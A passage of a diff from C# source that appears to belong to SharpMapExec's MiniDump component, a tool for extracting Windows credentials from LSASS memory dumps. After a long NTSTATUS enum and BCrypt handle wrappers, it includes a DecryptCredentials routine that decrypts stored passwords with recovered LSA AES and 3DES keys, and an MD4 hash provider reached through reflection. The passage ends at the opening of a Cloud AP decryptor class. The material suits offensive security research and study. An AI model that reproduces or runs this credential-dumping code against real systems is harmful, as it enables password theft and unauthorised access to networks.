99	+	NoMoreFiles = 0x80000006,
100	+	HandlesClosed = 0x8000000a,
101	+	PartialCopy = 0x8000000d,
102	+	DeviceBusy = 0x80000011,
103	+	InvalidEaName = 0x80000013,
104	+	EaListInconsistent = 0x80000014,
105	+	NoMoreEntries = 0x8000001a,
106	+	LongJump = 0x80000026,
107	+	DllMightBeInsecure = 0x8000002b,
108	+
109	+	Error = 0xc0000000,
110	+	Unsuccessful = 0xc0000001,
111	+	NotImplemented = 0xc0000002,
112	+	InvalidInfoClass = 0xc0000003,
113	+	InfoLengthMismatch = 0xc0000004,
114	+	AccessViolation = 0xc0000005,
115	+	InPageError = 0xc0000006,
116	+	PagefileQuota = 0xc0000007,
117	+	InvalidHandle = 0xc0000008,
118	+	BadInitialStack = 0xc0000009,
119	+	BadInitialPc = 0xc000000a,
120	+	InvalidCid = 0xc000000b,
121	+	TimerNotCanceled = 0xc000000c,
122	+	InvalidParameter = 0xc000000d,
123	+	NoSuchDevice = 0xc000000e,
124	+	NoSuchFile = 0xc000000f,
125	+	InvalidDeviceRequest = 0xc0000010,
126	+	EndOfFile = 0xc0000011,
127	+	WrongVolume = 0xc0000012,
128	+	NoMediaInDevice = 0xc0000013,
129	+	NoMemory = 0xc0000017,
130	+	ConflictingAddresses = 0xc0000018,
131	+	NotMappedView = 0xc0000019,
132	+	UnableToFreeVm = 0xc000001a,
133	+	UnableToDeleteSection = 0xc000001b,
134	+	IllegalInstruction = 0xc000001d,
135	+	AlreadyCommitted = 0xc0000021,
136	+	AccessDenied = 0xc0000022,
137	+	BufferTooSmall = 0xc0000023,
138	+	InsufficientBuffer = 0x7a,
139	+	ObjectTypeMismatch = 0xc0000024,
140	+	NonContinuableException = 0xc0000025,
141	+	BadStack = 0xc0000028,
142	+	NotLocked = 0xc000002a,
143	+	NotCommitted = 0xc000002d,
144	+	InvalidParameterMix = 0xc0000030,
145	+	ObjectNameInvalid = 0xc0000033,
146	+	ObjectNameNotFound = 0xc0000034,
147	+	ObjectNameCollision = 0xc0000035,
148	+	ObjectPathInvalid = 0xc0000039,
149	+	ObjectPathNotFound = 0xc000003a,
150	+	ObjectPathSyntaxBad = 0xc000003b,
151	+	DataOverrun = 0xc000003c,
152	+	DataLate = 0xc000003d,
153	+	DataError = 0xc000003e,
154	+	CrcError = 0xc000003f,
155	+	SectionTooBig = 0xc0000040,
156	+	PortConnectionRefused = 0xc0000041,
157	+	InvalidPortHandle = 0xc0000042,
158	+	SharingViolation = 0xc0000043,
159	+	QuotaExceeded = 0xc0000044,
160	+	InvalidPageProtection = 0xc0000045,
161	+	MutantNotOwned = 0xc0000046,
162	+	SemaphoreLimitExceeded = 0xc0000047,
163	+	PortAlreadySet = 0xc0000048,
164	+	SectionNotImage = 0xc0000049,
165	+	SuspendCountExceeded = 0xc000004a,
166	+	ThreadIsTerminating = 0xc000004b,
167	+	BadWorkingSetLimit = 0xc000004c,
168	+	IncompatibleFileMap = 0xc000004d,
169	+	SectionProtection = 0xc000004e,
170	+	EasNotSupported = 0xc000004f,
171	+	EaTooLarge = 0xc0000050,
172	+	NonExistentEaEntry = 0xc0000051,
173	+	NoEasOnFile = 0xc0000052,
174	+	EaCorruptError = 0xc0000053,
175	+	FileLockConflict = 0xc0000054,
176	+	LockNotGranted = 0xc0000055,
177	+	DeletePending = 0xc0000056,
178	+	CtlFileNotSupported = 0xc0000057,
179	+	UnknownRevision = 0xc0000058,
180	+	RevisionMismatch = 0xc0000059,
181	+	InvalidOwner = 0xc000005a,
182	+	InvalidPrimaryGroup = 0xc000005b,
183	+	NoImpersonationToken = 0xc000005c,
184	+	CantDisableMandatory = 0xc000005d,
185	+	NoLogonServers = 0xc000005e,
186	+	NoSuchLogonSession = 0xc000005f,
187	+	NoSuchPrivilege = 0xc0000060,
188	+	PrivilegeNotHeld = 0xc0000061,
189	+	InvalidAccountName = 0xc0000062,
190	+	UserExists = 0xc0000063,
191	+	NoSuchUser = 0xc0000064,
192	+	GroupExists = 0xc0000065,
193	+	NoSuchGroup = 0xc0000066,
194	+	MemberInGroup = 0xc0000067,
195	+	MemberNotInGroup = 0xc0000068,
196	+	LastAdmin = 0xc0000069,
197	+	WrongPassword = 0xc000006a,
198	+	IllFormedPassword = 0xc000006b,
199	+	PasswordRestriction = 0xc000006c,
200	+	LogonFailure = 0xc000006d,
201	+	AccountRestriction = 0xc000006e,
202	+	InvalidLogonHours = 0xc000006f,
203	+	InvalidWorkstation = 0xc0000070,
204	+	PasswordExpired = 0xc0000071,
205	+	AccountDisabled = 0xc0000072,
206	+	NoneMapped = 0xc0000073,
207	+	TooManyLuidsRequested = 0xc0000074,
208	+	LuidsExhausted = 0xc0000075,
209	+	InvalidSubAuthority = 0xc0000076,
210	+	InvalidAcl = 0xc0000077,
211	+	InvalidSid = 0xc0000078,
212	+	InvalidSecurityDescr = 0xc0000079,
213	+	ProcedureNotFound = 0xc000007a,
214	+	InvalidImageFormat = 0xc000007b,
215	+	NoToken = 0xc000007c,
216	+	BadInheritanceAcl = 0xc000007d,
217	+	RangeNotLocked = 0xc000007e,
218	+	DiskFull = 0xc000007f,
219	+	ServerDisabled = 0xc0000080,
220	+	ServerNotDisabled = 0xc0000081,
221	+	TooManyGuidsRequested = 0xc0000082,
222	+	GuidsExhausted = 0xc0000083,
223	+	InvalidIdAuthority = 0xc0000084,
224	+	AgentsExhausted = 0xc0000085,
225	+	InvalidVolumeLabel = 0xc0000086,
226	+	SectionNotExtended = 0xc0000087,
227	+	NotMappedData = 0xc0000088,
228	+	ResourceDataNotFound = 0xc0000089,
229	+	ResourceTypeNotFound = 0xc000008a,
230	+	ResourceNameNotFound = 0xc000008b,
231	+	ArrayBoundsExceeded = 0xc000008c,
232	+	FloatDenormalOperand = 0xc000008d,
233	+	FloatDivideByZero = 0xc000008e,
234	+	FloatInexactResult = 0xc000008f,
235	+	FloatInvalidOperation = 0xc0000090,
236	+	FloatOverflow = 0xc0000091,
237	+	FloatStackCheck = 0xc0000092,
238	+	FloatUnderflow = 0xc0000093,
239	+	IntegerDivideByZero = 0xc0000094,
240	+	IntegerOverflow = 0xc0000095,
241	+	PrivilegedInstruction = 0xc0000096,
242	+	TooManyPagingFiles = 0xc0000097,
243	+	FileInvalid = 0xc0000098,
244	+	InstanceNotAvailable = 0xc00000ab,
245	+	PipeNotAvailable = 0xc00000ac,
246	+	InvalidPipeState = 0xc00000ad,
247	+	PipeBusy = 0xc00000ae,
248	+	IllegalFunction = 0xc00000af,
249	+	PipeDisconnected = 0xc00000b0,
250	+	PipeClosing = 0xc00000b1,
251	+	PipeConnected = 0xc00000b2,
252	+	PipeListening = 0xc00000b3,
253	+	InvalidReadMode = 0xc00000b4,
254	+	IoTimeout = 0xc00000b5,
255	+	FileForcedClosed = 0xc00000b6,
256	+	ProfilingNotStarted = 0xc00000b7,
257	+	ProfilingNotStopped = 0xc00000b8,
258	+	NotSameDevice = 0xc00000d4,
259	+	FileRenamed = 0xc00000d5,
260	+	CantWait = 0xc00000d8,
261	+	PipeEmpty = 0xc00000d9,
262	+	CantTerminateSelf = 0xc00000db,
263	+	InternalError = 0xc00000e5,
264	+	InvalidParameter1 = 0xc00000ef,
265	+	InvalidParameter2 = 0xc00000f0,
266	+	InvalidParameter3 = 0xc00000f1,
267	+	InvalidParameter4 = 0xc00000f2,
268	+	InvalidParameter5 = 0xc00000f3,
269	+	InvalidParameter6 = 0xc00000f4,
270	+	InvalidParameter7 = 0xc00000f5,
271	+	InvalidParameter8 = 0xc00000f6,
272	+	InvalidParameter9 = 0xc00000f7,
273	+	InvalidParameter10 = 0xc00000f8,
274	+	InvalidParameter11 = 0xc00000f9,
275	+	InvalidParameter12 = 0xc00000fa,
276	+	MappedFileSizeZero = 0xc000011e,
277	+	TooManyOpenedFiles = 0xc000011f,
278	+	Cancelled = 0xc0000120,
279	+	CannotDelete = 0xc0000121,
280	+	InvalidComputerName = 0xc0000122,
281	+	FileDeleted = 0xc0000123,
282	+	SpecialAccount = 0xc0000124,
283	+	SpecialGroup = 0xc0000125,
284	+	SpecialUser = 0xc0000126,
285	+	MembersPrimaryGroup = 0xc0000127,
286	+	FileClosed = 0xc0000128,
287	+	TooManyThreads = 0xc0000129,
288	+	ThreadNotInProcess = 0xc000012a,
289	+	TokenAlreadyInUse = 0xc000012b,
290	+	PagefileQuotaExceeded = 0xc000012c,
291	+	CommitmentLimit = 0xc000012d,
292	+	InvalidImageLeFormat = 0xc000012e,
293	+	InvalidImageNotMz = 0xc000012f,
294	+	InvalidImageProtect = 0xc0000130,
295	+	InvalidImageWin16 = 0xc0000131,
296	+	LogonServer = 0xc0000132,
297	+	DifferenceAtDc = 0xc0000133,
298	+	SynchronizationRequired = 0xc0000134,
299	+	DllNotFound = 0xc0000135,
300	+	IoPrivilegeFailed = 0xc0000137,
301	+	OrdinalNotFound = 0xc0000138,
302	+	EntryPointNotFound = 0xc0000139,
303	+	ControlCExit = 0xc000013a,
304	+	PortNotSet = 0xc0000353,
305	+	DebuggerInactive = 0xc0000354,
306	+	CallbackBypass = 0xc0000503,
307	+	PortClosed = 0xc0000700,
308	+	MessageLost = 0xc0000701,
309	+	InvalidMessage = 0xc0000702,
310	+	RequestCanceled = 0xc0000703,
311	+	RecursiveDispatch = 0xc0000704,
312	+	LpcReceiveBufferExpected = 0xc0000705,
313	+	LpcInvalidConnectionUsage = 0xc0000706,
314	+	LpcRequestsNotAllowed = 0xc0000707,
315	+	ResourceInUse = 0xc0000708,
316	+	ProcessIsProtected = 0xc0000712,
317	+	VolumeDirty = 0xc0000806,
318	+	FileCheckedOut = 0xc0000901,
319	+	CheckOutRequired = 0xc0000902,
320	+	BadFileType = 0xc0000903,
321	+	FileTooLarge = 0xc0000904,
322	+	FormsAuthRequired = 0xc0000905,
323	+	VirusInfected = 0xc0000906,
324	+	VirusDeleted = 0xc0000907,
325	+	TransactionalConflict = 0xc0190001,
326	+	InvalidTransaction = 0xc0190002,
327	+	TransactionNotActive = 0xc0190003,
328	+	TmInitializationFailed = 0xc0190004,
329	+	RmNotActive = 0xc0190005,
330	+	RmMetadataCorrupt = 0xc0190006,
331	+	TransactionNotJoined = 0xc0190007,
332	+	DirectoryNotRm = 0xc0190008,
333	+	CouldNotResizeLog = 0xc0190009,
334	+	TransactionsUnsupportedRemote = 0xc019000a,
335	+	LogResizeInvalidSize = 0xc019000b,
336	+	RemoteFileVersionMismatch = 0xc019000c,
337	+	CrmProtocolAlreadyExists = 0xc019000f,
338	+	TransactionPropagationFailed = 0xc0190010,
339	+	CrmProtocolNotFound = 0xc0190011,
340	+	TransactionSuperiorExists = 0xc0190012,
341	+	TransactionRequestNotValid = 0xc0190013,
342	+	TransactionNotRequested = 0xc0190014,
343	+	TransactionAlreadyAborted = 0xc0190015,
344	+	TransactionAlreadyCommitted = 0xc0190016,
345	+	TransactionInvalidMarshallBuffer = 0xc0190017,
346	+	CurrentTransactionNotValid = 0xc0190018,
347	+	LogGrowthFailed = 0xc0190019,
348	+	ObjectNoLongerExists = 0xc0190021,
349	+	StreamMiniversionNotFound = 0xc0190022,
350	+	StreamMiniversionNotValid = 0xc0190023,
351	+	MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024,
352	+	CantOpenMiniversionWithModifyIntent = 0xc0190025,
353	+	CantCreateMoreStreamMiniversions = 0xc0190026,
354	+	HandleNoLongerValid = 0xc0190028,
355	+	NoTxfMetadata = 0xc0190029,
356	+	LogCorruptionDetected = 0xc0190030,
357	+	CantRecoverWithHandleOpen = 0xc0190031,
358	+	RmDisconnected = 0xc0190032,
359	+	EnlistmentNotSuperior = 0xc0190033,
360	+	RecoveryNotNeeded = 0xc0190034,
361	+	RmAlreadyStarted = 0xc0190035,
362	+	FileIdentityNotPersistent = 0xc0190036,
363	+	CantBreakTransactionalDependency = 0xc0190037,
364	+	CantCrossRmBoundary = 0xc0190038,
365	+	TxfDirNotEmpty = 0xc0190039,
366	+	IndoubtTransactionsExist = 0xc019003a,
367	+	TmVolatile = 0xc019003b,
368	+	RollbackTimerExpired = 0xc019003c,
369	+	TxfAttributeCorrupt = 0xc019003d,
370	+	EfsNotAllowedInTransaction = 0xc019003e,
371	+	TransactionalOpenNotAllowed = 0xc019003f,
372	+	TransactedMappingUnsupportedRemote = 0xc0190040,
373	+	TxfMetadataAlreadyPresent = 0xc0190041,
374	+	TransactionScopeCallbacksNotSet = 0xc0190042,
375	+	TransactionRequiredPromotion = 0xc0190043,
376	+	CannotExecuteFileInTransaction = 0xc0190044,
377	+	TransactionsNotFrozen = 0xc0190045,
378	+
379	+	MaximumNtStatus = 0xffffffff
380	+	}
381	+
382	+	[StructLayout(LayoutKind.Sequential)]
383	+	public struct BCRYPT_ALG_HANDLE
384	+	{
385	+	private IntPtr handle;
386	+
387	+	/// <summary>Initializes a new instance of the <see cref="BCRYPT_ALG_HANDLE"/> struct.</summary>
388	+	/// <param name="preexistingHandle">An <see cref="IntPtr"/> object that represents the pre-existing handle to use.</param>
389	+	public BCRYPT_ALG_HANDLE(IntPtr preexistingHandle) => handle = preexistingHandle;
390	+
391	+	/// <summary>Returns an invalid handle by instantiating a <see cref="BCRYPT_ALG_HANDLE"/> object with <see cref="IntPtr.Zero"/>.</summary>
392	+	public static BCRYPT_ALG_HANDLE NULL => new BCRYPT_ALG_HANDLE(IntPtr.Zero);
393	+
394	+	/// <summary>Gets a value indicating whether this instance is a null handle.</summary>
395	+	public bool IsNull => handle == IntPtr.Zero;
396	+
397	+	/// <summary>Performs an explicit conversion from <see cref="BCRYPT_ALG_HANDLE"/> to <see cref="IntPtr"/>.</summary>
398	+	/// <param name="h">The handle.</param>
399	+	/// <returns>The result of the conversion.</returns>
400	+	public static explicit operator IntPtr(BCRYPT_ALG_HANDLE h) => h.handle;
401	+
402	+	/// <summary>Performs an implicit conversion from <see cref="IntPtr"/> to <see cref="BCRYPT_ALG_HANDLE"/>.</summary>
403	+	/// <param name="h">The pointer to a handle.</param>
404	+	/// <returns>The result of the conversion.</returns>
405	+	public static implicit operator BCRYPT_ALG_HANDLE(IntPtr h) => new BCRYPT_ALG_HANDLE(h);
406	+
407	+	/// <summary>Implements the operator !=.</summary>
408	+	/// <param name="h1">The first handle.</param>
409	+	/// <param name="h2">The second handle.</param>
410	+	/// <returns>The result of the operator.</returns>
411	+	public static bool operator !=(BCRYPT_ALG_HANDLE h1, BCRYPT_ALG_HANDLE h2) => !(h1 == h2);
412	+
413	+	/// <summary>Implements the operator ==.</summary>
414	+	/// <param name="h1">The first handle.</param>
415	+	/// <param name="h2">The second handle.</param>
416	+	/// <returns>The result of the operator.</returns>
417	+	public static bool operator ==(BCRYPT_ALG_HANDLE h1, BCRYPT_ALG_HANDLE h2) => h1.Equals(h2);
418	+
419	+	/// <inheritdoc/>
420	+	public override bool Equals(object obj) => obj is BCRYPT_ALG_HANDLE h ? handle == h.handle : false;
421	+
422	+	/// <inheritdoc/>
423	+	public override int GetHashCode() => handle.GetHashCode();
424	+
425	+	/// <inheritdoc/>
426	+	public IntPtr DangerousGetHandle() => handle;
427	+	}
428	+
429	+	[StructLayout(LayoutKind.Sequential)]
430	+	public struct BCRYPT_KEY_HANDLE
431	+	{
432	+	private IntPtr handle;
433	+
434	+	/// <summary>Initializes a new instance of the <see cref="BCRYPT_KEY_HANDLE"/> struct.</summary>
435	+	/// <param name="preexistingHandle">An <see cref="IntPtr"/> object that represents the pre-existing handle to use.</param>
436	+	public BCRYPT_KEY_HANDLE(IntPtr preexistingHandle) => handle = preexistingHandle;
437	+
438	+	/// <summary>Returns an invalid handle by instantiating a <see cref="BCRYPT_KEY_HANDLE"/> object with <see cref="IntPtr.Zero"/>.</summary>
439	+	public static BCRYPT_KEY_HANDLE NULL => new BCRYPT_KEY_HANDLE(IntPtr.Zero);
440	+
441	+	/// <summary>Gets a value indicating whether this instance is a null handle.</summary>
442	+	public bool IsNull => handle == IntPtr.Zero;
443	+
444	+	/// <summary>Performs an explicit conversion from <see cref="BCRYPT_KEY_HANDLE"/> to <see cref="IntPtr"/>.</summary>
445	+	/// <param name="h">The handle.</param>
446	+	/// <returns>The result of the conversion.</returns>
447	+	public static explicit operator IntPtr(BCRYPT_KEY_HANDLE h) => h.handle;
448	+
449	+	/// <summary>Performs an implicit conversion from <see cref="IntPtr"/> to <see cref="BCRYPT_KEY_HANDLE"/>.</summary>
450	+	/// <param name="h">The pointer to a handle.</param>
451	+	/// <returns>The result of the conversion.</returns>
452	+	public static implicit operator BCRYPT_KEY_HANDLE(IntPtr h) => new BCRYPT_KEY_HANDLE(h);
453	+
454	+	/// <summary>Implements the operator !=.</summary>
455	+	/// <param name="h1">The first handle.</param>
456	+	/// <param name="h2">The second handle.</param>
457	+	/// <returns>The result of the operator.</returns>
458	+	public static bool operator !=(BCRYPT_KEY_HANDLE h1, BCRYPT_KEY_HANDLE h2) => !(h1 == h2);
459	+
460	+	/// <summary>Implements the operator ==.</summary>
461	+	/// <param name="h1">The first handle.</param>
462	+	/// <param name="h2">The second handle.</param>
463	+	/// <returns>The result of the operator.</returns>
464	+	public static bool operator ==(BCRYPT_KEY_HANDLE h1, BCRYPT_KEY_HANDLE h2) => h1.Equals(h2);
465	+
466	+	/// <inheritdoc/>
467	+	public override bool Equals(object obj) => obj is BCRYPT_KEY_HANDLE h ? handle == h.handle : false;
468	+
469	+	/// <inheritdoc/>
470	+	public override int GetHashCode() => handle.GetHashCode();
471	+
472	+	/// <inheritdoc/>
473	+	public IntPtr DangerousGetHandle() => handle;
474	+	}
475	+
476	+	internal class BCrypt
477	+	{
478	+	[DllImport("bcrypt", CharSet = CharSet.Auto, SetLastError = true)]
479	+	public static extern NTStatus BCryptCloseAlgorithmProvider(BCRYPT_ALG_HANDLE hAlgorithm, uint dwFlags = 0);
480	+
481	+	[DllImport("bcrypt", CharSet = CharSet.Auto, SetLastError = true)]
482	+	public static extern NTStatus BCryptDestroyKey(BCRYPT_KEY_HANDLE hKey);
483	+
484	+	[DllImport("bcrypt", CharSet = CharSet.Auto, SetLastError = true)]
485	+	public static extern NTStatus BCryptDecrypt(SafeBCryptKeyHandle hKey, IntPtr pbInput, int cbInput, IntPtr pPaddingInfo, IntPtr pbIV, int cbIV, [Optional] IntPtr pbOutput, [Optional] int cbOutput, out int pcbResult, int dwFlags);
486	+
487	+	[DllImport("bcrypt", CharSet = CharSet.Auto, SetLastError = true)]
488	+	public static extern NTStatus BCryptOpenAlgorithmProvider(out SafeBCryptAlgorithmHandle phAlgorithm, string pszAlgId, [Optional] string pszImplementation, int dwFlags = 0);
489	+
490	+	[DllImport("bcrypt", CharSet = CharSet.Auto, SetLastError = true)]
491	+	public static extern NTStatus BCryptSetProperty(SafeBCryptAlgorithmHandle hObject, [MarshalAs(UnmanagedType.LPWStr)] string pszProperty, string pbInput, int cbInput, uint dwFlags = 0);
492	+
493	+	[DllImport("bcrypt", CharSet = CharSet.Auto, SetLastError = true)]
494	+	public static extern NTStatus BCryptGenerateSymmetricKey(SafeBCryptAlgorithmHandle hAlgorithm, out SafeBCryptKeyHandle phKey, [Optional] IntPtr pbKeyObject, [Optional] int cbKeyObject, IntPtr pbSecret, int cbSecret, int dwFlags = 0);
495	+
496	+	[DllImport("bcrypt", CharSet = CharSet.Auto, SetLastError = true)]
497	+	public static extern NTStatus BCryptGetProperty(SafeBCryptAlgorithmHandle hObject, [MarshalAs(UnmanagedType.LPWStr)] string pszProperty, byte[] pbOutput, int cbOutput, out uint pcbResult, int dwFlags = 0);
498	+
499	+	public static string BCRYPT_AES_ALGORITHM = "AES";
500	+	public static string BCRYPT_3DES_ALGORITHM = "3DES";
501	+	public static string BCRYPT_CHAINING_MODE = "ChainingMode";
502	+
503	+	public static string BCRYPT_CHAIN_MODE_CBC = "ChainingModeCBC";
504	+	public static string BCRYPT_CHAIN_MODE_CFB = "ChainingModeCFB";
505	+
506	+	//public static ArraySegment<byte> BCryptGetProperty(SafeBCryptAlgorithmHandle hObject, string propertyName)
507	+	//{
508	+	// uint length;
509	+	// BCryptGetProperty(hObject, propertyName, IntPtr.Zero, 0, out length, 0);
510	+	// byte[] result = new byte[length];
511	+	// BCryptGetProperty(hObject, propertyName, result, result.Length, out length, 0);
512	+	// return new ArraySegment<byte>(result, 0, length);
513	+	//}
514	+
515	+	public static byte[] DecryptCredentials(byte[] encrypedPass, LsaDecryptor.LsaKeys lsakeys)
516	+	{
517	+	SafeBCryptAlgorithmHandle hProvider, hDesProvider;
518	+	SafeBCryptKeyHandle hAes, hDes;
519	+	int result;
520	+	NTStatus status;
521	+
522	+	var passDecrypted = new byte[encrypedPass.Length + 1];
523	+	var initializationVector = new byte[16];
524	+
525	+	Array.Copy(lsakeys.iv, initializationVector, lsakeys.iv.Length);
526	+
527	+	if (encrypedPass.Length % 8 != 0)
528	+	{
529	+	initializationVector = new byte[16];
530	+
531	+	BCryptOpenAlgorithmProvider(out hProvider, BCRYPT_AES_ALGORITHM, null, 0);
532	+
533	+	using (hProvider)
534	+	{
535	+	BCryptSetProperty(hProvider, BCRYPT_CHAINING_MODE, BCRYPT_CHAIN_MODE_CFB, BCRYPT_CHAIN_MODE_CFB.Length, 0);
536	+
537	+	var pkeypinnedArray = GCHandle.Alloc(lsakeys.aes_key, GCHandleType.Pinned);
538	+	var pkey = pkeypinnedArray.AddrOfPinnedObject();
539	+
540	+	var pencrypedPasspinnedArray = GCHandle.Alloc(encrypedPass, GCHandleType.Pinned);
541	+	var pencrypedPass = pencrypedPasspinnedArray.AddrOfPinnedObject();
542	+
543	+	var pinitializationVectorpinnedArray = GCHandle.Alloc(initializationVector, GCHandleType.Pinned);
544	+	var pinitializationVector = pinitializationVectorpinnedArray.AddrOfPinnedObject();
545	+
546	+	var ppassDecryptedinnedArray = GCHandle.Alloc(passDecrypted, GCHandleType.Pinned);
547	+	var ppassDecrypted = ppassDecryptedinnedArray.AddrOfPinnedObject();
548	+
549	+	//byte[] testb = new byte[0];
550	+	//BCryptGetProperty(hProvider, "ObjectLength", testb, 0, out uint pcbResult, 0);
551	+	//Console.WriteLine(pcbResult);
552	+	//testb = new byte[pcbResult];
553	+	//BCryptGetProperty(hProvider, "ObjectLength", testb, testb.Length, out uint pcbResult2, 0);
554	+	//Console.WriteLine(Helpers.ByteArrayToString(testb));
555	+
556	+	BCryptGenerateSymmetricKey(hProvider, out hAes, IntPtr.Zero, 0, pkey, lsakeys.aes_key.Length, 0);
557	+	using (hAes)
558	+	{
559	+	status = (NTStatus)BCryptDecrypt(hAes, pencrypedPass, encrypedPass.Length, IntPtr.Zero,
560	+	pinitializationVector, initializationVector.Length, ppassDecrypted, passDecrypted.Length, out result, 0);
561	+
562	+	if (status != 0) return new byte[0];
563	+	}
564	+	}
565	+	}
566	+	else
567	+	{
568	+	BCryptOpenAlgorithmProvider(out hDesProvider, BCRYPT_3DES_ALGORITHM, null, 0);
569	+
570	+	using (hDesProvider)
571	+	{
572	+	BCryptSetProperty(hDesProvider, BCRYPT_CHAINING_MODE, BCRYPT_CHAIN_MODE_CBC,
573	+	BCRYPT_CHAIN_MODE_CBC.Length, 0);
574	+
575	+	var pkeypinnedArray = GCHandle.Alloc(lsakeys.des_key, GCHandleType.Pinned);
576	+	var pkey = pkeypinnedArray.AddrOfPinnedObject();
577	+
578	+	var pencrypedPasspinnedArray = GCHandle.Alloc(encrypedPass, GCHandleType.Pinned);
579	+	var pencrypedPass = pencrypedPasspinnedArray.AddrOfPinnedObject();
580	+
581	+	var pinitializationVectorpinnedArray = GCHandle.Alloc(initializationVector, GCHandleType.Pinned);
582	+	var pinitializationVector = pinitializationVectorpinnedArray.AddrOfPinnedObject();
583	+
584	+	var ppassDecryptedinnedArray = GCHandle.Alloc(passDecrypted, GCHandleType.Pinned);
585	+	var ppassDecrypted = ppassDecryptedinnedArray.AddrOfPinnedObject();
586	+
587	+	BCryptGenerateSymmetricKey(hDesProvider, out hDes, IntPtr.Zero, 0, pkey, lsakeys.des_key.Length, 0);
588	+	using (hDes)
589	+	{
590	+	status = (NTStatus)BCryptDecrypt(hDes, pencrypedPass, encrypedPass.Length, IntPtr.Zero,
591	+	pinitializationVector, (initializationVector.Length / 2), ppassDecrypted, passDecrypted.Length, out result, 0);
592	+	if (status != 0) return new byte[0];
593	+	}
594	+	}
595	+	}
596	+
597	+	Array.Resize(ref passDecrypted, result);
598	+	return passDecrypted;
599	+	}
600	+
601	+	public static string GetHashSHA1(byte[] data)
602	+	{
603	+	using (var sha1 = new System.Security.Cryptography.SHA1CryptoServiceProvider())
604	+	{
605	+	return string.Concat(sha1.ComputeHash(data).Select(x => x.ToString("X2")));
606	+	}
607	+	}
608	+	}
609	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Crypto/Crypto.cs

1	+	using System.Diagnostics.Contracts;
2	+	using System.Linq;
3	+	using System.Reflection;
4	+	using System.Runtime.InteropServices;
5	+
6	+	namespace System.Security.Cryptography
7	+	{
8	+	internal static class Ext
9	+	{
10	+	public static HashAlgorithm MD4Singleton;
11	+
12	+	static Ext()
13	+	{
14	+	MD4Singleton = System.Security.Cryptography.MD4.Create();
15	+	}
16	+
17	+	public static byte[] MD4(this byte[] s)
18	+	{
19	+	return MD4Singleton.ComputeHash(s);
20	+	}
21	+
22	+	public static string AsHexString(this byte[] bytes)
23	+	{
24	+	return String.Join("", bytes.Select(h => h.ToString("X2")));
25	+	}
26	+	}
27	+
28	+	[System.Runtime.InteropServices.ComVisible(true)]
29	+	public abstract class MD4 : HashAlgorithm
30	+	{
31	+	static MD4()
32	+	{
33	+	CryptoConfig.AddAlgorithm(typeof(MD4CryptoServiceProvider), "System.Security.Cryptography.MD4");
34	+	}
35	+
36	+	protected MD4()
37	+	{
38	+	HashSizeValue = 128;
39	+	}
40	+
41	+	new static public MD4 Create()
42	+	{
43	+	return Create("System.Security.Cryptography.MD4");
44	+	}
45	+
46	+	new static public MD4 Create(string algName)
47	+	{
48	+	return (MD4)CryptoConfig.CreateFromName(algName);
49	+	}
50	+	}
51	+
52	+	[System.Runtime.InteropServices.ComVisible(true)]
53	+	public sealed class MD4CryptoServiceProvider : MD4
54	+	{
55	+	internal static class Utils
56	+	{
57	+	internal static Type UtilsType = Type.GetType("System.Security.Cryptography.Utils");
58	+
59	+	public static T InvokeInternalMethodOfType<T>(object o, object pType, string methodName, params object[] args)
60	+	{
61	+	var internalType = (pType is string internalTypeName) ? Type.GetType(internalTypeName) : (Type)pType;
62	+	var internalMethods = internalType.GetMethods(BindingFlags.NonPublic \| BindingFlags.FlattenHierarchy \| (o == null ? BindingFlags.Static : 0));
63	+	var internalMethod = internalMethods.Where(m => m.Name == methodName && m.GetParameters().Length == args.Length).Single();
64	+	return (T)internalMethod?.Invoke(o, args);
65	+	}
66	+
67	+	public static T GetInternalPropertyValueOfInternalType<T>(object o, object pType, string propertyName)
68	+	{
69	+	var internalType = (pType is string internalTypeName) ? Type.GetType(internalTypeName) : (Type)pType;
70	+	var internalProperty = internalType.GetProperty(propertyName, BindingFlags.NonPublic \| (o == null ? BindingFlags.Static : 0));
71	+	return (T)internalProperty.GetValue(o);
72	+	}
73	+
74	+	internal static SafeHandle CreateHash(int algid)
75	+	{
76	+	return InvokeInternalMethodOfType<SafeHandle>(null, UtilsType, "CreateHash", GetInternalPropertyValueOfInternalType<object>(null, UtilsType, "StaticProvHandle"), algid);
77	+	}
78	+
79	+	internal static void HashData(SafeHandle h, byte[] data, int ibStart, int cbSize)
80	+	{
81	+	InvokeInternalMethodOfType<object>(null, UtilsType, "HashData", h, data, ibStart, cbSize);
82	+	}
83	+
84	+	internal static byte[] EndHash(SafeHandle h)
85	+	{
86	+	return InvokeInternalMethodOfType<byte[]>(null, UtilsType, "EndHash", h);
87	+	}
88	+	}
89	+
90	+	internal const int ALG_CLASS_HASH = (4 << 13);
91	+	internal const int ALG_TYPE_ANY = (0);
92	+	internal const int ALG_SID_MD4 = 2;
93	+	internal const int CALG_MD4 = (ALG_CLASS_HASH \| ALG_TYPE_ANY \| ALG_SID_MD4);
94	+
95	+	[System.Security.SecurityCritical]
96	+	private SafeHandle _safeHashHandle = null;
97	+
98	+	[System.Security.SecuritySafeCritical]
99	+	public MD4CryptoServiceProvider()
100	+	{
101	+	if (CryptoConfig.AllowOnlyFipsAlgorithms)
102	+	throw new InvalidOperationException("Cryptography_NonCompliantFIPSAlgorithm");
103	+	Contract.EndContractBlock();
104	+	// cheat with Reflection
105	+	_safeHashHandle = Utils.CreateHash(CALG_MD4);
106	+	}
107	+
108	+	protected override void Dispose(bool disposing)
109	+	{
110	+	if (_safeHashHandle != null && !_safeHashHandle.IsClosed)
111	+	_safeHashHandle.Dispose();
112	+	base.Dispose(disposing);
113	+	}
114	+
115	+	public override void Initialize()
116	+	{
117	+	if (_safeHashHandle != null && !_safeHashHandle.IsClosed)
118	+	_safeHashHandle.Dispose();
119	+
120	+	_safeHashHandle = Utils.CreateHash(CALG_MD4);
121	+	}
122	+
123	+	protected override void HashCore(byte[] rgb, int ibStart, int cbSize)
124	+	{
125	+	Utils.HashData(_safeHashHandle, rgb, ibStart, cbSize);
126	+	}
127	+
128	+	protected override byte[] HashFinal()
129	+	{
130	+	return Utils.EndHash(_safeHashHandle);
131	+	}
132	+	}
133	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Decryptor/Cloudap_.cs

1	+	using Minidump.Crypto;
2	+	using Minidump.Templates;
3	+	using System;
4	+	using System.Collections.Generic;
5	+	using System.Linq;
6	+	using System.Runtime.InteropServices;
7	+	using System.Text;
8	+	using static Minidump.Helpers;
9	+
10	+	namespace Minidump.Decryptor
11	+	{
12	+	public class Cloudap_
13	+	{
